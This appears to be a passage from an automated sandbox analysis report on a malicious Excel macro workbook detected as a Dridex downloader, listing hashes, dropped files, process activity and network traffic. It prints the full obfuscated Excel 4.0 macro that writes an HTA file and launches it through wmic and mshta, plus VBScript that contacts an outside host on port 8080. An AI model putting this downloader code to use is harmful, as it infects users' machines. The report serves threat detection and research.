                                                                                                                                      SecuriteInfo.com.Heur.8342.xlsGet hashmaliciousBrowse
                                                                                                                                      • 157.230.250.107
                                                                                                                                      57949616735.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 157.230.250.107
                                                                                                                                      57949616735.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 157.230.250.107
                                                                                                                                      44307.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 157.230.250.107
                                                                                                                                      44307.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 157.230.250.107
                                                                                                                                      77859564213.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 157.230.250.107
                                                                                                                                      77859564213.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 157.230.250.107
                                                                                                                                      1762311.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 157.230.250.107
                                                                                                                                      1762311.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 157.230.250.107
                                                                                                                                      88985.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 157.230.250.107
                                                                                                                                      88985.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 157.230.250.107

                                                                                                                                      JA3 Fingerprints

                                                                                                                                      No context

                                                                                                                                      Dropped Files

                                                                                                                                      No context

                                                                                                                                      Created / dropped Files

                                                                                                                                      C:\ProgramData\vqcMnINBAOOJC.rtf
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                      File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                      Category:modified
                                                                                                                                      Size (bytes):5040
                                                                                                                                      Entropy (8bit):5.095389504560149
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:rFsnLfSGtt691e7fDTPnSQ473YuzXyIHmXPYi/mbWCj4VR5VLqRDbHTn8uDqRcdr:rFsLfpttaw7fnPnjwlX7mXQCmbjmVADX
                                                                                                                                      MD5:9FAED765B90101028AAAD70C3A104FAA
                                                                                                                                      SHA1:862941EF3F09768C1B1D9505668601B482E0C709
                                                                                                                                      SHA-256:9426C84906FE083E7DD95791AD9C24FC841C2A3EFE78595675AA489DBADFFF32
                                                                                                                                      SHA-512:EFE9EA33D054CC121291250D8F2A2437C08E68CE506127F6BEE185F8C79D6E6B061819D6A718BCE558724BFD56910C8FEF508A39986A743CC39FE9BB256D4013
                                                                                                                                      Malicious:true
                                                                                                                                      Yara Hits:
                                                                                                                                      • Rule: JoeSecurity_DridexDownloader, Description: Yara detected Dridex Downloader, Source: C:\ProgramData\vqcMnINBAOOJC.rtf, Author: Joe Security
                                                                                                                                      Reputation:low
                                                                                                                                      Preview: <!DOCTYPE html>..<html>..<head>..<HTA:APPLICATION ID="CS"..APPLICATIONNAME="ttrgnkrtegjtjgjerg"..WINDOWSTATE="minimize"..MAXIMIZEBUTTON="no"..MINIMIZEBUTTON="no"..CAPTION="no"..SHOWINTASKBAR="no">..<script type="text/vbscript" LANGUAGE="VBScript" >....Function dqbzESpSEZBpIx()..Set wCESFvAdFB = CreateObject("" & "" & "MSX" & Chr(77) & "L2." & Chr(83) & "erv" & "erX" & Chr(77) & "LH" & "" & "" & "" & Chr(84) & Chr(84) & Chr(80) & Chr(46) & "6.0" & "")..wCESFvAdFB.Open "" & "" & "GE" & "" & "" & Chr(84), Chr(104) & Chr(116) & "tp:" & "//" & "15" & "" & "7." & "" & "230" & ".2" & Chr(53) & "" & "" & "" & "0.1" & Chr(48) & Chr(55) & Chr(58) & Chr(56) & Chr(48) & "80/" & Chr(109) & "fkr" & Chr(109) & "oth" & "" & "er" & "fu" & Chr(99) & Chr(107) & Chr(101) & "ru6" & Chr(121) & "82" & "sa" & "ssw" & Chr(104) & Chr(111) & Chr(114) & "ehf" & Chr(57) & Chr(101), False ..wCESFvAdFB.SetRequestHeader "User-Agent","lube"..wCESFvAdFB.Send..End Function....Function ytBKmPfovFxXtTw()..gwYKXuaDzh = "wm
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\7065FF96-0F32-40B3-B28E-F452FBC97932
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                      File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):140163
                                                                                                                                      Entropy (8bit):5.358157876379636
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:bcQIfgxrBdA3gBwtnQ9DQW+zCb4Ff7nXbovidXiE6LWmE9:xuQ9DQW+zJXfH
                                                                                                                                      MD5:4C38F7C7B239A9C116B88D9E641FDC6E
                                                                                                                                      SHA1:62082E300CA9A23599AD150AB2F9FC4A59AE9D30
                                                                                                                                      SHA-256:B5DC29AE868C34102DA8BA258C64782A6084D12B91BEAD8CC919DF28071943CA
                                                                                                                                      SHA-512:734527E01096AC3DC4854FE8805B116F3718C4F01872EA0532DCCBA5B7F619B12D6E91C748F4E608E45F616DDC8CA6F0D8FCF9A6AE6F3BEB9BF3FA4C5C6F2379
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-12-01T23:43:16">.. Build: 16.0.14715.30527-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\22B0DE4E.png
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                      File Type:PNG image data, 960 x 540, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):95290
                                                                                                                                      Entropy (8bit):7.964656092224063
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:Z1M1Jci8gZKV4LZqcJ9D/ufmtLPLVNJoCH0/UN8EDmPmPH9999999GAdqT99999b:Z1M16TguaNTLGmtLfJ3hN8DqH999999q
                                                                                                                                      MD5:D3C811B819094DAD38EAECB1DFFC8E50
                                                                                                                                      SHA1:712F71711F017D47A447BF96C6D35686AB0C64FC
                                                                                                                                      SHA-256:CF5F75B2DEBB0A1D6BA1C0131DAD4FA7BC6E117CB525D853F5697EC0830615C0
                                                                                                                                      SHA-512:D181328D708F185A3AB810687D0034A56D5C5EF85D990623032FF3259A7B40BB448F5B1E17C9AE57300F6222B829FF0F685463DC889AC48F25F7B629916DE29B
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      Preview: .PNG........IHDR.............9].{....IDATx..w.%u}...L?..}....]`.I..f....cLl..h..Q.c.%?%F...A,.t.EAQz.e;...M.|~.|f.,".K.<}\...93s..;.y...PJ)....`0.....`x.c=.;`0.....`0....S......`0.....`x^`...`0.....`0.....l0.....`0.....F......`0.....y......`0.....`x^`...`0.....`0.....l0.....`xJQJ..z.w.`0<.q...0.....`0<.(..b...O..`0...S.6.....`0LA..GDj!...6.7o...7......`..`0...C)N.].......$I..)%Y..eY.l..H).uH)I.\_....>...p.'.q.F.r..W......c0..O...m0...b..D..'W.Q..,X....!..JJ.e..B.R),K..~..B.{.Rf.@..u....X...+...QJ!.`..|.........3..u..|..L...,........<_....;...<.F..R.Q...S.k.}4...'.......,F...S.5.z......E../f..U.|..k._..2.....]........Y)..D...6......q.....<..k....E....o..z.....F.....?...G...^......~................. .{.G.y$.s.....h4.B.~.z....c...:.,.8.....s.=...? MS.?..r;....d1..`0.....o".X.....:P..%..........>..8..E...0...+t;]....,^.i/<.Q.^....S_x..../......W..{..5.6>.9/y.....)%...2.lZ..g.....0......l._..v3..~,.jm.k....h].Z.....~..3{.lz..+W.....s..._..W.
                                                                                                                                      C:\Users\user\Desktop\1E850000
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                      File Type:Microsoft Excel 2007+
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):132860
                                                                                                                                      Entropy (8bit):7.947363835661108
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:nUCmEb0PoNGJL71M16TguaNTLGmtLfJ3hN8DqH9999999HqT99999999WnsAGanQ:n9bWoN8LC+kLGmxfJ3hNci3On
                                                                                                                                      MD5:538D614D34A75DD9A37972FC29CB7D6C
                                                                                                                                      SHA1:F76CA6CFF38F304FD6CF7B924D674BB234591EEC
                                                                                                                                      SHA-256:AE2D713D8B6F866C2AF1D33063F6E3D34011718B8A353828DDF19B3E82900A1D
                                                                                                                                      SHA-512:14E8BCFF820EDB7B0F84C08DA5C9E236EC80CCBE3E67DED9B57C00EDBD9877D1703C5707D2897C3AEB06BB2DA22DEB0B33C98712490D83B979C33EA5AC08D365
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      Preview: PK..........!.z..d....w.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0...H.C.+J.r@.5.....(.....7y..=.tA.nQ/Y......Lo...XBD.].U...W.Mk.5z-.Y.I8%.wP.5 ..ooz.u.,(.a.f).'.Q....|.G;...H...<.9.S.......%p.LY..{/0.....7...c.......h).%.N...~2.....K....B.. YS....?!%*..?..n...m.9....`.].[.*.lJ...xGf.!..>l....F....1..Kn...>.....".L.%.$..q..BF?tbl...v......P.....}...jK.{.O.....<..s....BO....bZ...<mS.F..YE.[.o...w+t.K]..}@....W...]....4......i.\m3.1.@.`.fl.........PK..........!..U0#...
                                                                                                                                      C:\Users\user\Desktop\1E850000:Zone.Identifier
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):26
                                                                                                                                      Entropy (8bit):3.95006375643621
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:ggPYV:rPYV
                                                                                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:high, very likely benign file
                                                                                                                                      Preview: [ZoneTransfer]....ZoneId=0
                                                                                                                                      C:\Users\user\Desktop\56449657.xlsm (copy)
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                      File Type:Microsoft Excel 2007+
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):132860
                                                                                                                                      Entropy (8bit):7.947363835661108
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:nUCmEb0PoNGJL71M16TguaNTLGmtLfJ3hN8DqH9999999HqT99999999WnsAGanQ:n9bWoN8LC+kLGmxfJ3hNci3On
                                                                                                                                      MD5:538D614D34A75DD9A37972FC29CB7D6C
                                                                                                                                      SHA1:F76CA6CFF38F304FD6CF7B924D674BB234591EEC
                                                                                                                                      SHA-256:AE2D713D8B6F866C2AF1D33063F6E3D34011718B8A353828DDF19B3E82900A1D
                                                                                                                                      SHA-512:14E8BCFF820EDB7B0F84C08DA5C9E236EC80CCBE3E67DED9B57C00EDBD9877D1703C5707D2897C3AEB06BB2DA22DEB0B33C98712490D83B979C33EA5AC08D365
                                                                                                                                      Malicious:true
                                                                                                                                      Preview: PK..........!.z..d....w.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0...H.C.+J.r@.5.....(.....7y..=.tA.nQ/Y......Lo...XBD.].U...W.Mk.5z-.Y.I8%.wP.5 ..ooz.u.,(.a.f).'.Q....|.G;...H...<.9.S.......%p.LY..{/0.....7...c.......h).%.N...~2.....K....B.. YS....?!%*..?..n...m.9....`.].[.*.lJ...xGf.!..>l....F....1..Kn...>.....".L.%.$..q..BF?tbl...v......P.....}...jK.{.O.....<..s....BO....bZ...<mS.F..YE.[.o...w+t.K]..}@....W...]....4......i.\m3.1.@.`.fl.........PK..........!..U0#...
                                                                                                                                      C:\Users\user\Desktop\~$56449657.xlsm
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):165
                                                                                                                                      Entropy (8bit):1.6081032063576088
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:RFXI6dtt:RJ1
                                                                                                                                      MD5:7AB76C81182111AC93ACF915CA8331D5
                                                                                                                                      SHA1:68B94B5D4C83A6FB415C8026AF61F3F8745E2559
                                                                                                                                      SHA-256:6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
                                                                                                                                      SHA-512:A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
                                                                                                                                      Malicious:true
                                                                                                                                      Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                      \Device\ConDrv
                                                                                                                                      Process:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                      File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):160
                                                                                                                                      Entropy (8bit):5.065985063226091
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:YwM2FgCKGWMRX1eRHXWXKSovrj4WA3iygK5k3koZ3Pveys1MgjWLyWAFJQAiveyn:Yw7gJGWMXJXKSOdYiygKkXe/egq+eAin
                                                                                                                                      MD5:7B23232078E37BFB12D43891AD733D69
                                                                                                                                      SHA1:3A6281C7F8A9AFC2183EEBEDA042268077D4BCB0
                                                                                                                                      SHA-256:5666ED71FA333DDB1DD08947451F5722D3D872EC192A9434B730A652CC26F09A
                                                                                                                                      SHA-512:4DEB5195B4DB01D2396AD4BF773D05D0D899DEA682ED63563A9664A02F777AABDD5B0B36B5BDF8A4A9B17C63B5C10B04F2C6501B58DBBB9CC5A70BA67AC2B1E7
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: Executing (Win32_Process)->Create()...Method execution successful....Out Parameters:..instance of __PARAMETERS..{...ProcessId = 1332;...ReturnValue = 0;..};....

                                                                                                                                      Static File Info

                                                                                                                                      General

                                                                                                                                      File type:Microsoft Excel 2007+
                                                                                                                                      Entropy (8bit):7.945199506900952
                                                                                                                                      TrID:
                                                                                                                                      • Excel Microsoft Office Open XML Format document with Macro (51004/1) 51.52%
                                                                                                                                      • Excel Microsoft Office Open XML Format document (40004/1) 40.40%
                                                                                                                                      • ZIP compressed archive (8000/1) 8.08%
                                                                                                                                      File name:56449657.xlsm
                                                                                                                                      File size:134569
                                                                                                                                      MD5:3ff89734f2c6a54fe79464e94151ce10
                                                                                                                                      SHA1:4b4f24fec70071de89a76b70e12394a56efdcf62
                                                                                                                                      SHA256:9818931574ed09e96ddc907c47907cfc6fbfad3f6bc3fca1c0f3b210c1d458f4
                                                                                                                                      SHA512:486a2c9268ebe62ead6582c72332eb6d32e8a74917514f5baf3e97e131fd41849e82dd41c17c3a0da37c1be8801999252da09b5a328307a74117837a053d0344
                                                                                                                                      SSDEEP:3072:TTakgjRg1M16TguaNTLGmtLfJ3hN8DqH9999999HqT99999999WnsAGanOp1g0dD:TTujB+kLGmxfJ3hNci3Ozg0dD
                                                                                                                                      File Content Preview:PK..........!.8v..............[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                      File Icon

                                                                                                                                      Icon Hash:74ecd0e2f696908c

                                                                                                                                      Static OLE Info

                                                                                                                                      General

                                                                                                                                      Document Type:OpenXML
                                                                                                                                      Number of OLE Files:1

                                                                                                                                      OLE File "56449657.xlsm"

                                                                                                                                      Indicators

                                                                                                                                      Has Summary Info:
                                                                                                                                      Application Name:
                                                                                                                                      Encrypted Document:
                                                                                                                                      Contains Word Document Stream:
                                                                                                                                      Contains Workbook/Book Stream:
                                                                                                                                      Contains PowerPoint Document Stream:
                                                                                                                                      Contains Visio Document Stream:
                                                                                                                                      Contains ObjectPool Stream:
                                                                                                                                      Flash Objects Count:
                                                                                                                                      Contains VBA Macros:

                                                                                                                                      Macro 4.0 Code

                                                                                                                                      1,18,=V50-F6
                                                                                                                                      3,18,=W8+F54
                                                                                                                                      4,18,=F52-R52
                                                                                                                                      5,18,=M59*E74
                                                                                                                                      6,18,=C29+U71
                                                                                                                                      8,18,=R100*L9
                                                                                                                                      9,18,=Z67+O77
                                                                                                                                      11,18,=X48*C17
                                                                                                                                      13,18,=K58*O57
                                                                                                                                      14,18,=ALERT("Error! Sendi" & CHAR(110) & "g r" & CHAR(101) & CHAR(112) & "ort to" & CHAR(32) & CHAR(77) & "icrosoft...")
                                                                                                                                      15,18,=B83+L73
                                                                                                                                      18,18,=L23+Y18
                                                                                                                                      22,18,=B90*Q80
                                                                                                                                      23,18,=D52*E76
                                                                                                                                      28,18,=FOPEN("C:\ProgramData\vqc" & CHAR(77) & "" & CHAR(110) & "INBAOOJC.rtf", 3)
                                                                                                                                      29,18,=D22-H51
                                                                                                                                      30,18,=Z88+Z76
                                                                                                                                      34,18,=G59+F40
                                                                                                                                      35,18,=J34+I60
                                                                                                                                      36,18,=D47-O96
                                                                                                                                      37,18,=Y65+N9
                                                                                                                                      39,18,=FOR.CELL("xjoEoryTpTNoFl",Sheet1!BO155:DD274, TRUE)
                                                                                                                                      40,18,=O38*C99
                                                                                                                                      43,18,=Q78-O42
                                                                                                                                      47,18,=Z81-X87
                                                                                                                                      48,18,=D88-N75
                                                                                                                                      49,18,=R87-L37
                                                                                                                                      52,18,=FWRITE(0,CHAR(xjoEoryTpTNoFl))
                                                                                                                                      54,18,=B9+I27
                                                                                                                                      56,18,=R89+H18
                                                                                                                                      57,18,=J57-V53
                                                                                                                                      58,18,=B22+N73
                                                                                                                                      59,18,=J99+Q26
                                                                                                                                      60,18,=V32-X41
                                                                                                                                      61,18,=Y15*R96
                                                                                                                                      62,18,=H50*G76
                                                                                                                                      63,18,=M15+L19
                                                                                                                                      64,18,=W90*L23
                                                                                                                                      65,18,=O58*C45
                                                                                                                                      66,18,=X24+L19
                                                                                                                                      67,18,=NEXT()
                                                                                                                                      69,18,=V87-J28
                                                                                                                                      71,18,=R46*B12
                                                                                                                                      73,18,=O56*H44
                                                                                                                                      75,18,=K31+T58
                                                                                                                                      77,18,=R17*C34
                                                                                                                                      78,18,=U67+J13
                                                                                                                                      79,18,=F63*E65
                                                                                                                                      80,18,=EXEC("wmic proces" & CHAR(115) & CHAR(32) & "ca" & CHAR(108) & "l " & CHAR(99) & CHAR(114) & "eate " & CHAR(34) & CHAR(109) & "sh" & CHAR(116) & CHAR(97) & " C" & CHAR(58) & "\ProgramD" & CHAR(97) & "ta\vqcMnINBAOOJC.rt" & CHAR(102) & "" & CHAR(34))
                                                                                                                                      82,18,=W93+E13
                                                                                                                                      83,18,=U57*U52
                                                                                                                                      84,18,=U46-A41
                                                                                                                                      89,18,=T33-T25
                                                                                                                                      91,18,=RETURN()
                                                                                                                                      

                                                                                                                                      Network Behavior

                                                                                                                                      Network Port Distribution

                                                                                                                                      TCP Packets

                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                      Dec 2, 2021 00:44:49.437407970 CET498268080192.168.2.4157.230.250.107
                                                                                                                                      Dec 2, 2021 00:44:49.709111929 CET808049826157.230.250.107192.168.2.4
                                                                                                                                      Dec 2, 2021 00:44:49.709470987 CET498268080192.168.2.4157.230.250.107
                                                                                                                                      Dec 2, 2021 00:44:49.711606979 CET498268080192.168.2.4157.230.250.107
                                                                                                                                      Dec 2, 2021 00:44:49.982547998 CET808049826157.230.250.107192.168.2.4
                                                                                                                                      Dec 2, 2021 00:44:50.373827934 CET808049826157.230.250.107192.168.2.4
                                                                                                                                      Dec 2, 2021 00:44:50.428730011 CET498268080192.168.2.4157.230.250.107

                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                      • 157.230.250.107:8080

                                                                                                                                      HTTP Packets

                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                      0192.168.2.449826157.230.250.1078080C:\Windows\System32\mshta.exe
                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                      Dec 2, 2021 00:44:49.711606979 CET8427OUTGET /mfkrmotherfuckeru6y82sasswhorehf9e HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Language: en-US
                                                                                                                                      User-Agent: lube
                                                                                                                                      Host: 157.230.250.107:8080
                                                                                                                                      Dec 2, 2021 00:44:50.373827934 CET8427INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.15.12
                                                                                                                                      Date: Wed, 01 Dec 2021 23:44:50 GMT
                                                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                                                      Content-Length: 13
                                                                                                                                      Connection: keep-alive
                                                                                                                                      Data Raw: 68 69 20 63 6f 77 66 75 63 6b 65 72 73
                                                                                                                                      Data Ascii: hi cowfuckers


                                                                                                                                      Code Manipulations

                                                                                                                                      Statistics

                                                                                                                                      CPU Usage

                                                                                                                                      Click to jump to process

                                                                                                                                      Memory Usage

                                                                                                                                      Click to jump to process

                                                                                                                                      High Level Behavior Distribution

                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                      Behavior

                                                                                                                                      Click to jump to process

                                                                                                                                      System Behavior

                                                                                                                                      General

                                                                                                                                      Start time:00:43:14
                                                                                                                                      Start date:02/12/2021
                                                                                                                                      Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                                                      Imagebase:0x1220000
                                                                                                                                      File size:27110184 bytes
                                                                                                                                      MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high

                                                                                                                                      General

                                                                                                                                      Start time:00:44:45
                                                                                                                                      Start date:02/12/2021
                                                                                                                                      Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:wmic process call create "mshta C:\ProgramData\vqcMnINBAOOJC.rtf"
                                                                                                                                      Imagebase:0xa60000
                                                                                                                                      File size:391680 bytes
                                                                                                                                      MD5 hash:79A01FCD1C8166C5642F37D1E0FB7BA8
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high

                                                                                                                                      General

                                                                                                                                      Start time:00:44:46
                                                                                                                                      Start date:02/12/2021
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff724c50000
                                                                                                                                      File size:625664 bytes
                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high

                                                                                                                                      General

                                                                                                                                      Start time:00:44:47
                                                                                                                                      Start date:02/12/2021
                                                                                                                                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                      Imagebase:0x7ff757be0000
                                                                                                                                      File size:488448 bytes
                                                                                                                                      MD5 hash:A782A4ED336750D10B3CAF776AFE8E70
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:moderate

                                                                                                                                      General

                                                                                                                                      Start time:00:44:47
                                                                                                                                      Start date:02/12/2021
                                                                                                                                      Path:C:\Windows\System32\mshta.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:mshta C:\ProgramData\vqcMnINBAOOJC.rtf
                                                                                                                                      Imagebase:0x7ff7b2d80000
                                                                                                                                      File size:14848 bytes
                                                                                                                                      MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:moderate

                                                                                                                                      Disassembly

                                                                                                                                      Code Analysis

                                                                                                                                      Reset < >

                                                                                                                                        Executed Functions

                                                                                                                                        Non-executed Functions

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000003.787249500.000000000F81F000.00000004.00000001.sdmp, Offset: 0F81F000, based on PE: false
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: b4f167277391fa28dfbd70830be0e53d17ad5045096e588027eca9168a6750d3
                                                                                                                                        • Instruction ID: eed0bcc4103e62bc2f5964c19c73e2585cba77db0fb83b5a32d2362ba3f43510
                                                                                                                                        • Opcode Fuzzy Hash: b4f167277391fa28dfbd70830be0e53d17ad5045096e588027eca9168a6750d3
                                                                                                                                        • Instruction Fuzzy Hash: 80D1436240E7D18FCB5787388879680BFB0AE17214B4E85CBC4C5CF4A3D369A85AD763
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000003.663345173.000000000F932000.00000004.00000001.sdmp, Offset: 0F932000, based on PE: false
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: bed0cf16c04607d757e99252298f7c2f953a642502c10e066051d4ff7bf60f07
                                                                                                                                        • Instruction ID: 4a5a87b07eba4adb51a30c3abeec8055af46702babdfba18ab54a84b9f6a13cc
                                                                                                                                        • Opcode Fuzzy Hash: bed0cf16c04607d757e99252298f7c2f953a642502c10e066051d4ff7bf60f07
                                                                                                                                        • Instruction Fuzzy Hash: 33F131A184E3C64FE35387B049256A17FB0AE5312470F86EBC4D5CF4B3D66D899AC722
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000003.663345173.000000000F932000.00000004.00000001.sdmp, Offset: 0F932000, based on PE: false
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 5f62ee0d15f17f0b02a0e4f51fd343bb1063bc28988a1653bdc0e0fbbde39dd9
                                                                                                                                        • Instruction ID: dd6c9a675b2640a9e195f74944783022a43498b46bfb9ff005d30ac4fe6bddcd
                                                                                                                                        • Opcode Fuzzy Hash: 5f62ee0d15f17f0b02a0e4f51fd343bb1063bc28988a1653bdc0e0fbbde39dd9
                                                                                                                                        • Instruction Fuzzy Hash: B5B10EA290D7A29FD3138F708CE67917FA1AF23705F5A48DAC0D18E5E7E615C80AC746
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%